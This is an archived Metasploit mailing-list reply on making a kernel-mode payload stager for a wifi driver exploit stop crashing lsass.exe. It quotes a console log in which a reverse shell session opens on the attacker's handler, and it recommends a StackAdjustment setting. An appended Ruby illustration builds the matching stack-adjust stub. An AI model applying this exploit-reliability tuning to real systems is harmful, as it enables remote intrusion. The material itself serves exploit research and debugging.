Metasploit mailing list archives
Mistake in kernel mode payloads
From: mmiller at hick.org (Matt Miller)
Date: Tue, 11 Mar 2008 13:45:53 -0700
On Tue, Mar 11, 2008 at 08:43:41PM +0100, Giuseppe Gottardi wrote:
> On Wed, Feb 27, 2008 at 1:34 AM, <mmiller at hick.org> wrote:
> > What is EXITFUNC set to when you run your exploit? In general, the stager assumes that the user-mode payload will take care of cleanup. Currently, this typically involves a call to ExitProcess, ExitThread, or generating an exception (depending on EXITFUNC). If your EXITFUNC is set to seh this will likely cause lsass to crash in the manner that you're seeing.
>
> msf exploit(intel_2200BG_probe) > rexploit
> [*] Started reverse handler
> [*] Sending probe exploit to 00:0e:35:95:7b:45...
> [-] #################################################################################################################
> [*] Sending stage (474 bytes)
> [*] Command shell session 2 opened (192.168.33.212:4444 -> 192.168.33.159:1085)
> #
> [*] Completed sending probe. (lsass.exe dies)
The most likely reason for this has to do with available stack space for the stager. Try setting 'StackAdjustment' => -3500 in your 'Payload' information hash (take a look at windows/smb/ms06_040_netapi for an example). In general, if you use a staged payload and receive a connection but the process crashes, it may be indicative of the stager attempting to read more data than is available on the stack (leading to the call to recv failing and the process crashing). We have thought about making StackAdjustment default for Windows exploits and may do that in the future. The other wifi driver exploits most likely need to have this added as well for reliability.
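As an added illustration (not code from this thread or from Metasploit itself), the standalone Ruby below shows what a negative 'StackAdjustment' in an exploit's 'Payload' hash amounts to on x86, together with the sanity check a module author would want on the value. It assumes the framework prepends an "add esp, imm32" stub ahead of the stager; the 'Space' value and the stager buffer size are constructed for the example.

```ruby
# Standalone illustration of the 'StackAdjustment' payload option.
# Not Metasploit's own code; the framework is assumed to prepend an
# equivalent stack-pointer adjustment before the stager runs.

# Payload information hash as carried by an exploit module. The
# StackAdjustment value is the one recommended in the reply above;
# 'Space' is a constructed sample value.
PAYLOAD_INFO = {
  'Space'           => 2048,
  'StackAdjustment' => -3500,
}

# x86 "add esp, imm32": opcode 0x81, ModRM 0xC4 (reg field /0 = ADD,
# r/m = esp), then a little-endian signed 32-bit immediate.
# A negative immediate moves esp downward, reserving room below the
# stager so its reads and calls do not run out of usable stack.
def stack_adjust_stub(adjustment)
  unless (-2**31...2**31).cover?(adjustment)
    raise ArgumentError, 'adjustment must fit a signed 32-bit immediate'
  end
  "\x81\xC4".b + [adjustment].pack('V')
end

# Prepend the stub to a payload when the module asks for an adjustment.
def prepend_stack_adjustment(payload, info)
  adj = info['StackAdjustment']
  return payload if adj.nil? || adj.zero?
  stack_adjust_stub(adj) + payload
end

# Reliability check: the adjustment must reserve space (be negative)
# and cover the largest buffer the stager reads into. A positive value
# would consume stack instead and make the crash more likely.
def adjustment_covers?(adjustment, stager_buffer_size)
  adjustment < 0 && -adjustment >= stager_buffer_size
end

if __FILE__ == $0
  stub = stack_adjust_stub(PAYLOAD_INFO['StackAdjustment'])
  puts "stub bytes: #{stub.unpack1('H*')}"   # 81c454f2ffff for -3500
  puts "covers 3072-byte stager buffer: #{adjustment_covers?(-3500, 3072)}"
end
```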